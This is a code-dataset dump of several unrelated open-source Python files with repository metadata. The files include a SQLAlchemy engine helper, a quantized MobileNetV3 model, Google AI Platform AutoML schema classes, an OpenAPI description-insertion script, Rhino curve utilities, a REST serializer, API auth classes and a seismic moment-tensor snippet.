def process_bind_param(self, value, dialect):
return json.dumps(value)
def process_result_value(self, value, dialect):
return json.loads(value)
@attr.s(auto_attribs=True)
class Engine:
system: str = "sqlite"
database: str = ""
host: str = ""
port: int = 0
username: str = ""
password: str = ""
@property
def url(self) -> str:
prefix = f"{self.system}://"
auth = f"{self.username}:{self.password}@{self.host}:{self.port}"
suffix = f"/{self.database}"
if self.system == "sqlite":
return prefix + suffix
return prefix + auth + suffix
@classmethod
def from_config(cls, config) -> "Engine":
return cls( # type: ignore
system=config.system,
username=config.username,
password=config.password,
host=config.host,
port=config.port,
database=config.database,
)
def create(self):
return create_engine(self.url)
def create_session(self, engine=None):
engine = engine or self.create()
Session = sessionmaker(bind=engine)
return Session()
| 811 | 349 | 45 |
bec5a5fbc0c17c5944c8cd04be49c871c91a55a9 | 651 | py | Python | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | 2 | 2019-09-04T03:29:12.000Z | 2021-03-02T07:22:08.000Z | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | null | null | null | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | 3 | 2019-09-04T05:57:02.000Z | 2019-09-15T21:21:47.000Z | # This modules contains definitions used in Exercise Files
from typing import Any
def print_with_title(
output: Any,
title: str = '',
linebreaks_before: int = 2,
linebreaks_after: int = 2,
put_stars_after: bool = True,
) -> None:
"""
Print linebreak-padded output with a title and optional line of 80 stars
afterward
"""
print(
'\n' * linebreaks_before + title + '\n' * 2,
output,
'\n' * linebreaks_after,
sep='',
)
if put_stars_after:
print('*' * 80)
if __name__ == '__main__':
print_with_title('This module is working as expected!')
| 23.25 | 76 | 0.589862 | # This modules contains definitions used in Exercise Files
from typing import Any
def print_with_title(
output: Any,
title: str = '',
linebreaks_before: int = 2,
linebreaks_after: int = 2,
put_stars_after: bool = True,
) -> None:
"""
Print linebreak-padded output with a title and optional line of 80 stars
afterward
"""
print(
'\n' * linebreaks_before + title + '\n' * 2,
output,
'\n' * linebreaks_after,
sep='',
)
if put_stars_after:
print('*' * 80)
if __name__ == '__main__':
print_with_title('This module is working as expected!')
| 0 | 0 | 0 |
0778ebef3af258a1d259010e5612ff39de977bce | 9,513 | py | Python | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | '''MobileNetV3 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import os
import sys
sys.path.append(".")
from meta_utils.meta_quantized_module import MetaQuantConv, MetaQuantLinear
def conv3x3(in_planes, out_planes, kernel_size=3, stride=0, padding=1, bias=False, bitW=1):
" 3x3 convolution with padding "
return MetaQuantConv(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias, bitW=bitW)
'''
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size // reduction),
nn.ReLU(inplace=True),
nn.Conv2d(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size),
hsigmoid()
'''
class Block(nn.Module):
'''expand + depthwise + pointwise'''
from ptflops import get_model_complexity_info
test()
| 36.588462 | 130 | 0.589089 | '''MobileNetV3 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import os
import sys
sys.path.append(".")
from meta_utils.meta_quantized_module import MetaQuantConv, MetaQuantLinear
def conv3x3(in_planes, out_planes, kernel_size=3, stride=0, padding=1, bias=False, bitW=1):
" 3x3 convolution with padding "
return MetaQuantConv(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias, bitW=bitW)
class hswish(nn.Module):
def forward(self, x):
out = x * F.relu6(x + 3, inplace=True) / 6
return out
class hsigmoid(nn.Module):
def forward(self, x):
out = F.relu6(x + 3, inplace=True) / 6
return out
'''
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size // reduction),
nn.ReLU(inplace=True),
nn.Conv2d(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size),
hsigmoid()
'''
class SeModule(nn.Module):
def __init__(self, in_size, reduction=4):
super(SeModule, self).__init__()
self.se = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
conv3x3(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0),
nn.BatchNorm2d(in_size // reduction),
nn.ReLU(inplace=True),
conv3x3(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0),
nn.BatchNorm2d(in_size),
hsigmoid()
)
def forward(self, x):
return x * self.se(x)
class Block(nn.Module):
'''expand + depthwise + pointwise'''
def __init__(self, kernel_size, in_size, expand_size, out_size, nolinear, semodule, stride):
super(Block, self).__init__()
self.stride = stride
self.se = semodule
self.conv1 = conv3x3(in_size, expand_size, kernel_size=1, stride=1, padding=0, bias=False)
self.bn1 = nn.BatchNorm2d(expand_size)
self.nolinear1 = nolinear
self.conv2 = conv3x3(expand_size, expand_size, kernel_size=kernel_size, stride=stride, padding=kernel_size//2, bias=False)
self.bn2 = nn.BatchNorm2d(expand_size)
self.nolinear2 = nolinear
self.conv3 = conv3x3(expand_size, out_size, kernel_size=1, stride=1, padding=0, bias=False)
self.bn3 = nn.BatchNorm2d(out_size)
self.shortcut = nn.Sequential()
if stride == 1 and in_size != out_size:
self.shortcut = nn.Sequential(
conv3x3(in_size, out_size, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(out_size),
)
def forward(self, x):
out = self.nolinear1(self.bn1(self.conv1(x)))
out = self.nolinear2(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
if self.se != None:
out = self.se(out)
out = out + self.shortcut(x) if self.stride==1 else out
return out
class MobileNetV3_Large(nn.Module):
def __init__(self, num_classes=1000):
super(MobileNetV3_Large, self).__init__()
self.features = []
self.conv1 = conv3x3(3, 16, kernel_size=3, stride=2, padding=1, bias=False)
self.features.append(self.conv1)
self.bn1 = nn.BatchNorm2d(16)
self.features.append(self.bn1)
self.hs1 = hswish()
self.features.append(self.hs1)
self.bneck = nn.Sequential(
Block(3, 16, 16, 16, nn.ReLU(inplace=True), None, 1),
Block(3, 16, 64, 24, nn.ReLU(inplace=True), None, 2),
Block(3, 24, 72, 24, nn.ReLU(inplace=True), None, 1),
Block(5, 24, 72, 40, nn.ReLU(inplace=True), SeModule(40), 2),
Block(5, 40, 120, 40, nn.ReLU(inplace=True), SeModule(40), 1),
Block(5, 40, 120, 40, nn.ReLU(inplace=True), SeModule(40), 1),
Block(3, 40, 240, 80, hswish(), None, 2),
Block(3, 80, 200, 80, hswish(), None, 1),
Block(3, 80, 184, 80, hswish(), None, 1),
Block(3, 80, 184, 80, hswish(), None, 1),
Block(3, 80, 480, 112, hswish(), SeModule(112), 1),
Block(3, 112, 672, 112, hswish(), SeModule(112), 1),
Block(5, 112, 672, 160, hswish(), SeModule(160), 1),
Block(5, 160, 672, 160, hswish(), SeModule(160), 2),
Block(5, 160, 960, 160, hswish(), SeModule(160), 1),
)
self.features.extend([block for block in self.bneck])
self.conv2 = conv3x3(160, 960, kernel_size=1, stride=1, padding=0, bias=False)
self.features.append(self.conv2)
self.bn2 = nn.BatchNorm2d(960)
self.features.append(self.bn2)
self.hs2 = hswish()
self.features.append(self.hs2)
self.linear3 = MetaQuantLinear(960, 1280)
self.bn3 = nn.BatchNorm1d(1280)
self.hs3 = hswish()
self.linear4 = MetaQuantLinear(1280, num_classes)
self.init_params()
self.features = nn.Sequential(*self.features)
def init_params(self):
for m in self.modules():
if isinstance(m, MetaQuantConv):
init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, MetaQuantLinear):
init.normal_(m.weight, std=0.001)
if m.bias is not None:
init.constant_(m.bias, 0)
def forward(self, x):
out = self.hs1(self.bn1(self.conv1(x)))
out = self.bneck(out)
out = self.hs2(self.bn2(self.conv2(out)))
out = F.avg_pool2d(out, 7)
out = out.view(out.size(0), -1)
out = self.hs3(self.bn3(self.linear3(out)))
out = self.linear4(out)
return out
class MobileNetV3_Small(nn.Module):
def __init__(self, num_classes=1000):
super(MobileNetV3_Small, self).__init__()
self.features = []
self.conv1 = conv3x3(3, 16, kernel_size=3, stride=2, padding=1, bias=False)
self.features.append(self.conv1)
self.bn1 = nn.BatchNorm2d(16)
self.features.append(self.bn1)
self.hs1 = hswish()
self.features.append(self.hs1)
self.bneck = nn.Sequential(
Block(3, 16, 16, 16, nn.ReLU(inplace=True), SeModule(16), 2),
Block(3, 16, 72, 24, nn.ReLU(inplace=True), None, 2),
Block(3, 24, 88, 24, nn.ReLU(inplace=True), None, 1),
Block(5, 24, 96, 40, hswish(), SeModule(40), 2),
Block(5, 40, 240, 40, hswish(), SeModule(40), 1),
Block(5, 40, 240, 40, hswish(), SeModule(40), 1),
Block(5, 40, 120, 48, hswish(), SeModule(48), 1),
Block(5, 48, 144, 48, hswish(), SeModule(48), 1),
Block(5, 48, 288, 96, hswish(), SeModule(96), 2),
Block(5, 96, 576, 96, hswish(), SeModule(96), 1),
Block(5, 96, 576, 96, hswish(), SeModule(96), 1),
)
self.features.extend([block for block in self.bneck])
self.conv2 = conv3x3(96, 576, kernel_size=1, stride=1, padding=0, bias=False)
self.features.append(self.conv2)
self.bn2 = nn.BatchNorm2d(576)
self.features.append(self.bn2)
self.hs2 = hswish()
self.features.append(self.hs2)
self.linear3 = MetaQuantLinear(576, 1280) #nn.Linear(576, 1280)
self.bn3 = nn.BatchNorm1d(1280)
self.hs3 = hswish()
self.linear4 = MetaQuantLinear(1280, num_classes)
self.init_params()
self.features = nn.Sequential(*self.features)
def init_params(self):
for m in self.modules():
if isinstance(m, MetaQuantConv):
init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, MetaQuantLinear):
init.normal_(m.weight, std=0.001)
if m.bias is not None:
init.constant_(m.bias, 0)
def forward(self, x):
out = self.hs1(self.bn1(self.conv1(x)))
out = self.bneck(out)
out = self.hs2(self.bn2(self.conv2(out)))
out = F.avg_pool2d(out, 7)
out = out.view(out.size(0), -1)
out = self.hs3(self.bn3(self.linear3(out)))
out = self.linear4(out)
return out
def get_n_params(model):
pp=0
for p in list(model.parameters()):
nn=1
for s in list(p.size()):
nn = nn*s
pp += nn
return pp
from ptflops import get_model_complexity_info
def test():
#net = MobileNetV3_Small()
net = MobileNetV3_Large()
x = torch.randn(2,3,224,224)
y = net(x)
print(y.size())
print(get_n_params(net))
macs, params = get_model_complexity_info(net, (3, 224, 224), as_strings=True,
print_per_layer_stat=True, verbose=True)
print('{:<30} {:<8}'.format('Computational complexity: ', macs))
print('{:<30} {:<8}'.format('Number of parameters: ', params))
test()
| 7,913 | 41 | 478 |
0ee0394192b51c955a40df3785735b6429d88380 | 5,445 | py | Python | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1beta1.schema.trainingjob.definition",
manifest={
"AutoMlImageClassification",
"AutoMlImageClassificationInputs",
"AutoMlImageClassificationMetadata",
},
)
class AutoMlImageClassification(proto.Message):
r"""A TrainingJob that trains and uploads an AutoML Image
Classification Model.
Attributes:
inputs (~.automl_image_classification.AutoMlImageClassificationInputs):
The input parameters of this TrainingJob.
metadata (~.automl_image_classification.AutoMlImageClassificationMetadata):
The metadata information.
"""
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageClassificationInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageClassificationMetadata",
)
class AutoMlImageClassificationInputs(proto.Message):
r"""
Attributes:
model_type (~.automl_image_classification.AutoMlImageClassificationInputs.ModelType):
base_model_id (str):
The ID of the ``base`` model. If it is specified, the new
model will be trained based on the ``base`` model.
Otherwise, the new model will be trained from scratch. The
``base`` model must be in the same Project and Location as
the new Model to train, and have the same modelType.
budget_milli_node_hours (int):
The training budget of creating this model, expressed in
milli node hours i.e. 1,000 value in this field means 1 node
hour. The actual metadata.costMilliNodeHours will be equal
or less than this value. If further model training ceases to
provide any improvements, it will stop without using the
full budget and the metadata.successfulStopReason will be
``model-converged``. Note, node_hour = actual_hour \*
number_of_nodes_involved. For modelType
``cloud``\ (default), the budget must be between 8,000 and
800,000 milli node hours, inclusive. The default value is
192,000 which represents one day in wall time, considering 8
nodes are used. For model types ``mobile-tf-low-latency-1``,
``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1``,
the training budget must be between 1,000 and 100,000 milli
node hours, inclusive. The default value is 24,000 which
represents one day in wall time on a single node that is
used.
disable_early_stopping (bool):
Use the entire training budget. This disables
the early stopping feature. When false the early
stopping feature is enabled, which means that
AutoML Image Classification might stop training
before the entire training budget has been used.
multi_label (bool):
If false, a single-label (multi-class) Model
will be trained (i.e. assuming that for each
image just up to one annotation may be
applicable). If true, a multi-label Model will
be trained (i.e. assuming that for each image
multiple annotations may be applicable).
"""
class ModelType(proto.Enum):
r""""""
MODEL_TYPE_UNSPECIFIED = 0
CLOUD = 1
MOBILE_TF_LOW_LATENCY_1 = 2
MOBILE_TF_VERSATILE_1 = 3
MOBILE_TF_HIGH_ACCURACY_1 = 4
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
base_model_id = proto.Field(proto.STRING, number=2)
budget_milli_node_hours = proto.Field(proto.INT64, number=3)
disable_early_stopping = proto.Field(proto.BOOL, number=4)
multi_label = proto.Field(proto.BOOL, number=5)
class AutoMlImageClassificationMetadata(proto.Message):
r"""
Attributes:
cost_milli_node_hours (int):
The actual training cost of creating this
model, expressed in milli node hours, i.e. 1,000
value in this field means 1 node hour.
Guaranteed to not exceed
inputs.budgetMilliNodeHours.
successful_stop_reason (~.automl_image_classification.AutoMlImageClassificationMetadata.SuccessfulStopReason):
For successful job completions, this is the
reason why the job has finished.
"""
class SuccessfulStopReason(proto.Enum):
r""""""
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 37.8125 | 118 | 0.673462 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1beta1.schema.trainingjob.definition",
manifest={
"AutoMlImageClassification",
"AutoMlImageClassificationInputs",
"AutoMlImageClassificationMetadata",
},
)
class AutoMlImageClassification(proto.Message):
r"""A TrainingJob that trains and uploads an AutoML Image
Classification Model.
Attributes:
inputs (~.automl_image_classification.AutoMlImageClassificationInputs):
The input parameters of this TrainingJob.
metadata (~.automl_image_classification.AutoMlImageClassificationMetadata):
The metadata information.
"""
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageClassificationInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageClassificationMetadata",
)
class AutoMlImageClassificationInputs(proto.Message):
r"""
Attributes:
model_type (~.automl_image_classification.AutoMlImageClassificationInputs.ModelType):
base_model_id (str):
The ID of the ``base`` model. If it is specified, the new
model will be trained based on the ``base`` model.
Otherwise, the new model will be trained from scratch. The
``base`` model must be in the same Project and Location as
the new Model to train, and have the same modelType.
budget_milli_node_hours (int):
The training budget of creating this model, expressed in
milli node hours i.e. 1,000 value in this field means 1 node
hour. The actual metadata.costMilliNodeHours will be equal
or less than this value. If further model training ceases to
provide any improvements, it will stop without using the
full budget and the metadata.successfulStopReason will be
``model-converged``. Note, node_hour = actual_hour \*
number_of_nodes_involved. For modelType
``cloud``\ (default), the budget must be between 8,000 and
800,000 milli node hours, inclusive. The default value is
192,000 which represents one day in wall time, considering 8
nodes are used. For model types ``mobile-tf-low-latency-1``,
``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1``,
the training budget must be between 1,000 and 100,000 milli
node hours, inclusive. The default value is 24,000 which
represents one day in wall time on a single node that is
used.
disable_early_stopping (bool):
Use the entire training budget. This disables
the early stopping feature. When false the early
stopping feature is enabled, which means that
AutoML Image Classification might stop training
before the entire training budget has been used.
multi_label (bool):
If false, a single-label (multi-class) Model
will be trained (i.e. assuming that for each
image just up to one annotation may be
applicable). If true, a multi-label Model will
be trained (i.e. assuming that for each image
multiple annotations may be applicable).
"""
class ModelType(proto.Enum):
r""""""
MODEL_TYPE_UNSPECIFIED = 0
CLOUD = 1
MOBILE_TF_LOW_LATENCY_1 = 2
MOBILE_TF_VERSATILE_1 = 3
MOBILE_TF_HIGH_ACCURACY_1 = 4
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
base_model_id = proto.Field(proto.STRING, number=2)
budget_milli_node_hours = proto.Field(proto.INT64, number=3)
disable_early_stopping = proto.Field(proto.BOOL, number=4)
multi_label = proto.Field(proto.BOOL, number=5)
class AutoMlImageClassificationMetadata(proto.Message):
r"""
Attributes:
cost_milli_node_hours (int):
The actual training cost of creating this
model, expressed in milli node hours, i.e. 1,000
value in this field means 1 node hour.
Guaranteed to not exceed
inputs.budgetMilliNodeHours.
successful_stop_reason (~.automl_image_classification.AutoMlImageClassificationMetadata.SuccessfulStopReason):
For successful job completions, this is the
reason why the job has finished.
"""
class SuccessfulStopReason(proto.Enum):
r""""""
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 0 | 0 | 0 |
498ed27d25aaf7bb70dce790b84d513d20aa617b | 106 | py | Python | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | 2 | 2018-08-09T10:35:42.000Z | 2020-12-04T06:38:09.000Z | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | 2 | 2018-08-22T08:02:16.000Z | 2019-12-05T08:23:31.000Z | code/fakeRPi/__init__.py | BubiDevs/MagnumPi | 820038f7997379f0190c527914adbe2e2b615bb5 | [
"MIT"
] | null | null | null | """
This package is used to simulate RPi.GPIO library during development or if GPIO are not available.
""" | 35.333333 | 98 | 0.764151 | """
This package is used to simulate RPi.GPIO library during development or if GPIO are not available.
""" | 0 | 0 | 0 |
3231a1157ec2cc99477ddef20110685bb4430f56 | 2,155 | py | Python | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | 5 | 2019-08-30T09:56:27.000Z | 2021-02-22T11:08:34.000Z | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | null | null | null | tools/python/insert_descriptions.py | dhis2/dhis2-api-specification | bdef355508ec150be4bf0b4346b8b0d6a8e665b5 | [
"BSD-3-Clause"
] | 6 | 2018-10-12T07:50:11.000Z | 2020-10-18T05:39:49.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 18 15:34:25 2018
@author: philld
"""
import requests
import json
import re
specfile="../../docs/spec/src/info_openapi.json"
#docsfile="../../docs/input/web_api.cm"
docsfile="/home/philld/reps/dhis2-docs/src/commonmark/en/content/developer/web-api.md"
ofile=open(specfile,'r')
openapi = json.load(ofile)
ofile.close()
docfile = open(docsfile, "r")
docs = docfile.read()
docfile.close()
recurseDict(openapi,"DESC")
apifile= open(specfile,'w')
apifile.write(json.dumps(openapi , sort_keys=False, indent=2, separators=(',', ': ')))
apifile.close()
| 25.05814 | 121 | 0.49884 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 18 15:34:25 2018
@author: philld
"""
import requests
import json
import re
specfile="../../docs/spec/src/info_openapi.json"
#docsfile="../../docs/input/web_api.cm"
docsfile="/home/philld/reps/dhis2-docs/src/commonmark/en/content/developer/web-api.md"
ofile=open(specfile,'r')
openapi = json.load(ofile)
ofile.close()
docfile = open(docsfile, "r")
docs = docfile.read()
docfile.close()
def between(value, a, b):
# Find and validate before-part.
pos_a = value.find(a)
if pos_a == -1: return ""
# Find and validate after part.
pos_b = value.rfind(b)
if pos_b == -1: return ""
# Return middle part.
adjusted_pos_a = pos_a + len(a)
if adjusted_pos_a >= pos_b: return ""
return value[adjusted_pos_a:pos_b]
def recurseList(l,p):
#print(p)
for v in l:
if isinstance(v, dict):
if "x-name" in v:
nP = p + "_n-" + v["x-name"]
recurseDict(v,nP)
else:
if "name" in v:
nP = p + "_n-" + v["name"]
recurseDict(v,nP)
else:
if isinstance(v, list):
nP = p + "_"+v
recurseList(v,nP)
def recurseDict(d,p):
#print(p)
for k, v in d.items():
if isinstance(v, dict):
nP = p+"_"+k
recurseDict(v,nP)
else:
if isinstance(v, list):
nP = p+ "_"+k
recurseList(v,nP)
else:
if k == "description":
tagS= "<!-- API+"+p+" -->"
tagE= "<!-- API-"+p+" -->"
text = between(docs,tagS,tagE)
if text != "":
text = re.sub(r'([a-zA-Z])\n([a-zA-Z])',r'\1 \2',"<!-- auto-inserted: do not edit here -->"+text)
#print(text[0:500])
d.update({"description":text})
recurseDict(openapi,"DESC")
apifile= open(specfile,'w')
apifile.write(json.dumps(openapi , sort_keys=False, indent=2, separators=(',', ': ')))
apifile.close()
| 1,455 | 0 | 69 |
edc42480a50e42e688504cc06387909d1322efa2 | 1,471 | py | Python | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 6 | 2019-02-12T17:49:41.000Z | 2020-04-15T10:28:49.000Z | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 3 | 2020-07-01T13:45:44.000Z | 2020-10-07T14:40:52.000Z | src/compas_singular/rhino/geometry/curve.py | tkmmark/compas_pattern | 50528a4f9d6a253e9b7864eae482d04490761a74 | [
"MIT"
] | 6 | 2019-02-21T11:20:19.000Z | 2020-04-02T10:20:00.000Z | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import rhinoscriptsyntax as rs
from compas_rhino.geometry import RhinoCurve
__all__ = [
'RhinoCurve'
]
| 27.240741 | 107 | 0.601632 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import rhinoscriptsyntax as rs
from compas_rhino.geometry import RhinoCurve
__all__ = [
'RhinoCurve'
]
class RhinoCurve(RhinoCurve):
def __init__(self):
super(RhinoCurve, self).__init__()
def divide(self, number_of_segments, over_space=False):
points = []
rs.EnableRedraw(False)
if over_space:
space = self.space(number_of_segments + 1)
if space:
points = [list(rs.EvaluateCurve(self.guid, param)) for param in space]
else:
points = rs.DivideCurve(self.guid, number_of_segments, create_points=False, return_points=True)
points[:] = map(list, points)
rs.EnableRedraw(True)
return points
def length(self):
"""Return the length of the curve.
Returns
-------
float
The curve's length.
"""
return rs.CurveLength(self.guid)
def tangents(self, points):
tangents = []
if rs.IsPolyCurve(self.guid):
pass
elif rs.IsCurve(self.guid):
for point in points:
param = rs.CurveClosestPoint(self.guid, point)
vector = list(rs.CurveTangent(self.guid, param))
tangents.append(vector)
else:
raise Exception('Object is not a curve.')
return tangents
| 941 | 287 | 23 |
5852391e230d4b53f1a5d88b39b5c71c7f25ba44 | 467 | py | Python | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | casedetails/serializers.py | LABETE/TestYourProject | 416d5e7993343e42f031e48f4d78e5332d698519 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from .models import CaseDetail
class CaseDetailSerializer(serializers.ModelSerializer):
"""CaseDetailSerializer use the CaseDetail Model"""
| 29.1875 | 62 | 0.655246 | from rest_framework import serializers
from .models import CaseDetail
class CaseDetailSerializer(serializers.ModelSerializer):
"""CaseDetailSerializer use the CaseDetail Model"""
class Meta:
model = CaseDetail
# Fields displayed on the rest api for casedetails
fields = (
"id", "step", "expected", "actual", "input_data",
"output_data", "defect_id", "defect_id_displayed",
"case_id", "status",)
| 0 | 254 | 26 |
7eaede2556eae82c47ba4345831762e978e83739 | 547 | py | Python | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 28 | 2015-08-25T06:13:44.000Z | 2022-02-17T03:39:18.000Z | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 11 | 2015-09-15T07:31:02.000Z | 2021-02-09T10:30:13.000Z | kloudless/auth.py | theonlybex/kloudless-python | 3e00b4659e5f790a9129e858b19d0bf283cd8e1c | [
"MIT"
] | 8 | 2015-02-17T23:45:06.000Z | 2021-09-05T09:51:51.000Z | from __future__ import unicode_literals
from requests import auth
| 17.09375 | 59 | 0.66362 | from __future__ import unicode_literals
from requests import auth
class BaseAuth(auth.AuthBase):
def __init__(self, key):
self.key = key
@property
def scheme(self):
raise NotImplementedError
@property
def auth_header(self):
return '{} {}'.format(self.scheme, self.key)
def __call__(self, request):
request.headers['Authorization'] = self.auth_header
return request
class APIKeyAuth(BaseAuth):
scheme = 'APIKey'
class BearerTokenAuth(BaseAuth):
scheme = 'Bearer'
| 200 | 208 | 69 |
4f209a3661740bb773beeff9691143e7078681ef | 343 | py | Python | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | 4 | 2018-06-13T23:50:13.000Z | 2021-09-25T16:27:34.000Z | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | null | null | null | PYROCKO/mom_to_sdr.py | alirezaniki/DPSA | 24c6bbb51e3b27721d63140fd46dadd855e0f2b8 | [
"MIT"
] | null | null | null | from pyrocko import moment_tensor as mtm
magnitude = 5.4
exp = mtm.magnitude_to_moment(magnitude) # convert the mag to moment in [Nm]
# init pyrocko moment tensor
m = mtm.MomentTensor(
mnn = 0.04*exp,
mee = 0.6*exp,
mdd = -0.63*exp,
mne = 0.04*exp,
mnd = 0.5*exp,
med = 0.21*exp)
print(m) # print moment tensor
| 18.052632 | 77 | 0.638484 | from pyrocko import moment_tensor as mtm
magnitude = 5.4
exp = mtm.magnitude_to_moment(magnitude) # convert the mag to moment in [Nm]
# init pyrocko moment tensor
m = mtm.MomentTensor(
mnn = 0.04*exp,
mee = 0.6*exp,
mdd = -0.63*exp,
mne = 0.04*exp,
mnd = 0.5*exp,
med = 0.21*exp)
print(m) # print moment tensor
| 0 | 0 | 0 |
